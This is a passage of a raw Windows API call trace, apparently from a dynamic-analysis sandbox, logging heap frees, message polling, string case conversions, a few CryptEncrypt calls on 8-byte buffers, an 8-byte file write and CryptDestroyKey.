lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0153.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0153.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac30 | out: hHeap=0x2af0000) returned 1 [0153.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae10 | out: hHeap=0x2af0000) returned 1 [0153.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac48 | out: hHeap=0x2af0000) returned 1 [0153.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0153.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0153.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0153.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad80 | out: hHeap=0x2af0000) returned 1 [0153.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0153.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0153.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad98 | out: hHeap=0x2af0000) returned 1 [0153.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadf8 | out: hHeap=0x2af0000) returned 1 [0153.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0153.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0153.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0153.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0153.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae10 | out: hHeap=0x2af0000) returned 1 [0153.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab58 | out: hHeap=0x2af0000) returned 1 [0153.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad08 | out: hHeap=0x2af0000) returned 1 [0153.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0153.033] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0153.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab88 | out: hHeap=0x2af0000) returned 1 [0153.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0153.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad08 | out: hHeap=0x2af0000) returned 1 [0153.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0153.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad08 | out: hHeap=0x2af0000) returned 1 [0153.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0153.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac30 | out: hHeap=0x2af0000) returned 1 [0153.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0153.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaade0 | out: hHeap=0x2af0000) returned 1 [0153.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0153.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadf8 | out: hHeap=0x2af0000) returned 1 [0153.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0153.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad50 | out: hHeap=0x2af0000) returned 1 [0153.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0153.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac30 | out: hHeap=0x2af0000) returned 1 [0153.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0153.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad08 | out: hHeap=0x2af0000) returned 1 [0153.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0153.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad50 | out: hHeap=0x2af0000) returned 1 [0153.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0153.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad80 | out: hHeap=0x2af0000) returned 1 [0153.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaade0 | out: hHeap=0x2af0000) returned 1 [0153.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0153.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad08 | out: hHeap=0x2af0000) returned 1 [0153.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0153.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad50 | out: hHeap=0x2af0000) returned 1 [0153.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0153.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac30 | out: hHeap=0x2af0000) returned 1 [0153.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0153.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabb8 | out: hHeap=0x2af0000) returned 1 [0153.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0153.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac00 | out: hHeap=0x2af0000) returned 1 [0153.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0153.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0153.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaad08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0153.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad08 | out: hHeap=0x2af0000) returned 1 [0153.034] GetProcAddress (hModule=0x76390000, lpProcName="CryptEncrypt") returned 0x763c2cf0 [0153.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad50 | out: hHeap=0x2af0000) returned 1 [0153.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0153.034] CryptEncrypt (in: hKey=0x9e1b78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x8) returned 1 [0153.034] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.034] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.034] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.034] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.034] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0153.034] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.034] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.034] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0153.035] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0153.035] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0153.035] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0153.035] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0153.035] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0153.035] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0153.035] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaab70, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0153.035] CryptEncrypt (in: hKey=0x9e1b78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a71ae8*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x8 | out: pbData=0x2a71ae8*, pdwDataLen=0x8cef60*=0x8) returned 1 [0153.035] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.035] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.035] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.035] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.035] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.035] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.035] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.035] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0153.035] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0153.036] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0153.036] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0153.036] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0153.036] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0153.036] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0153.036] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0153.036] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0153.036] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0153.036] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0153.036] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0153.036] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0153.036] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0153.036] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0153.036] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0153.036] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0153.036] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0153.036] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0153.036] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.036] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0153.036] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0153.036] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0153.036] WriteFile (in: hFile=0x4f0, lpBuffer=0x2a71898*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a71898*, lpNumberOfBytesWritten=0x8cf5e4*=0x8, lpOverlapped=0x0) returned 1 [0153.037] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0153.037] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0153.037] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0153.037] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0153.037] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0153.038] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0153.038] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0153.038] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0153.038] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0153.038] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0153.038] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0153.038] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0153.038] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0153.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0153.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaa9a8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0153.038] CryptDestroyKey (hKey=0x9e1b78) returned 1 [0153.038] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0153.038] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0153.038] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0153.038] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0153.038] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0153.038] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0153.038] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0153.038] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0153.038] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0153.038] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0153.038] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0153.038] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0153.039] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0153.039] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0153.039] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0153.039] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0153.039] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0153.039] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0153.039] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0153.039] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0153.040] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0153.040] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0153.040] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0153.040] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0153.040] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0153.040] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0153.040] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0153.040] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0153.040] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0153.040] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0153.040] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0153.040] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0153.040] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0153.041] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0153.041] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0153.041] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0153.041] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0153.041] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0153.041] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0153.041] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0153.041] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0153.041] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0153.041] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0153.041] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0153.041] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0153.041] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0153.041] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0153.041] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0153.041] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0153.041] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0153.041] PeekMessageW (in: 